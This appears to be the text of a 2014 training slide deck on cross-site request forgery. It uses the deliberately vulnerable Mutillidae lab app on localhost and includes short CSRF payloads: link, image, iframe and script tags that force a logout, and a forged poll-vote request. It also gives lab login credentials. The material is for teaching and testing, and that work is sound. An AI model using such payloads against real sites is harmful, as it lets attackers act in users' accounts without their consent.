Date post: | 12-Aug-2015 |
Category: |
Technology |
Upload: | abhinav-sejpal |
View: | 25 times |
Download: | 2 times |
WHO AM I
I' M new Generation Exploratory Testy
Researcher & Reader in free time
Spekear at
Facilitator at Weekend Testing
Crowd Tester (AKA. Bug bounty Hunter)
Reported Security Vulnerabilities for 50+ unique customers all over the world
inlcluding Apple, yahoo, Outlook, adobe & etc.
Proficient at Functional, Usability , Accessibility & Compatibility Testing
Love to develop nasty code & Hack it :)
Works as Quality Analyst at
AKA. Bug Wrangler
Null & OWASP Co mmunity
passbrains.com
DISCLAIMER
This Presentation is intended for educational purposes only and I cannot be held liable for
any kind of damages done whatsoever to your machine, or other damages. Please - Don't try this attack on any others system without having context knowledge or
permission, this may harm to someone directly or indirectly.
Feel free to use this presentation for practice or education purpose.
^ I hope - You gotcha ^
SOCIAL MEDIA FEED
Hashtag for this session
# , # BitzNightTesting CSRF
: Twitter handle for feedback :
@ @ weekendtesting Abhinav_Sejpal
G+
http://goo.gl/kMAOs1
AGENDA
Introducation Set up Pen Testing LAB Overview of HTTP RequestIntercept the HTTP Request using Proxy (MITM)Understanding cross site attacksTesting for a cross site request forgery riskAttack Anti-forgery AttacksCommon Defences Against CSRF
SETUP THE TEST LAB
Install XAMPP
for:Acronym
X (to be read as "cross", meaning )cross-platformApache HTTP ServerMySQLPHPPerl
Why MySQL? is Girlfriend of PHP
TARGETED APPLICATION
Client Side language : HTML & Javascript Server side Language: PHP
DB : MYSQL
Why PHP ? - Any answer Here?
MySQL <3
http://w3techs.com/technologies/overview/programming_language/all
PHP IS USED BY 82.2% OF ALL THE WEBSITES AS SERVER-SIDE
PROGRAMMING LANGUAGE.
2013 Server-side Programming Language of the Year
Don't Mind Power of PHP > Facebook & yahoo
http://w3techs.com/blog/entry/web_technologies_of_the_year_2013
It's a free, open source web application provided to allowsecurity enthusiast to pen-test and hack a web application.
V.2X developed by aka
PLAY GROUND
MUTILLIDAE
Jeremy Druin webpwnized.
CSRF AKA. XSRF
THE ATTACKER EXPLOITS THE TRUST A WEBSITE
HAS AGAINST A USER’S BROWSER.
Permission faking\stealing Disruption of the normal sequence of the site
http://127.0.0.1/xampp/mutillidae/index.php?do=logout
DEMO #1Login ID - admin
password - adminpass
HTTP GET Request
<a href= >
: ANSWER DEMO 1:
<html>
<title> CSRF Demo 1 </title>
http://127.0.0.1/xampp/mutillidae/index.php?do=logout
Click me </a>
</html>
Yes it's not dangerous but annoying
UNDERSTANDING
Logout page has a simple HTTP GET that required noconfirmation
Every user who visited that page would immediately belogged out - that's CSRF in action.
SO WHAT DO YOU THINK,IT'S ALL ABOUT CLICK ?
ssh, No!!
Would you like to write CSRF exploit without click ??
<img src= >
CSRF GET Request with Image Tag
<html>
<title> CSRF Demo 1 </title>
http://127.0.0.1/xampp/mutillidae/index.php?do=logout
</html>
HTTP REQUEST
<iframe src="http://127.0.0.1/xampp/mutillidae/index.php?
do=logout"></iframe>
<script> var X= new Image(); X.src= "
http://127.0.0.1/xampp/mutillidae/index.php?do=logout";
</script>
<html>
<title> CSRF Demo 1 </title>
<a href =
> Click me </a>
</html>
:: SOLUTION #1 ::
http://127.0.0.1/xampp/mutillidae/index.php?page=user-poll.php&csrf-
token=&choice=nmap&initials=n&user-poll-php-submit-button=Submit+Vote
DOES IT EASY TO CREATE CSRF HTTP REQUEST ?
No - you should try out
IronWASP
CSRF PoC Generator - Tool for automatically generatingexploits for CSRF vulnerabilities
* One Click POC *
* Hybrid automation *
thanks a ton to Lava & Jayesh
{ Post HTTP Request }
CHALLENGE #2
CHALLENGE #3
Add user with out admin knowledge
LIVE CHALLENGE
* SIGNUP DISABLED * PLEASE USE THE USERNAME TEST AND THE
PASSWORD TEST
CSRF & XSRFUpdate the user info. without their knowledge
http://testphp.vulnweb.com/userinfo.php
Copyright © 2014, Acunetix Ltd
POPULAR COOL FINDINGS
by Amol Facebook CSRF worth USD 5000
GOOGLE GROUPS PROFILE CSRFGoogle Account display pic deletion
Facebook Account deactivation
Advance Leanings - CSRF Token Validation Fail
http://haiderm.com/csrf-token-protection-bypass-methods/
INDIAN HACKERS/INFOSEC GUYS & GROUPS YOU
SHOULD BE FOLLOWING IN TWITTER
Thank-you http://garage4hackers.com/ community
- Twitter Folks -
@ @ , @ , @
CREDITS
riyazwalikar TroyHunt yog3sharma makash& @
Big thank You to @ , @ & you All.
anatshri
weekendtesting srinivasskc
LICENSE AND COPYRIGHTS
https://slides.com/abhinavsejpal/weekend-testing-csrf
copyrights 2013-2014 Abhinav Sejpal
-----
( CC BY-NC-ND 3.0)
Attribution-NonCommercial-NoDerivs 3.0 Unported
Dedicated to my lovely daddy